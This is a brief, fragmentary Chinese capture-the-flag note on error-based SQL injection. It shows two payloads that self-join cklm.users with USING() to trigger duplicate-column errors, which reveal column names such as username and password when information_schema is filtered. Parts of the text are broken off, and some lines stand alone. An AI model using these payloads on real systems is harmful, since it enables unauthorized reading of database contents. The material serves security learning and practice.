这个题是把
接下来的可以用这个语句报错注入
然后
相关文章:
database,table,information这些都过滤了所以没法查infomation_schema查数据select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username))c);这个语句可以把username这个字段进行爆出来select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username,password))c);这样可以依次爆出剩下的字段相关文章: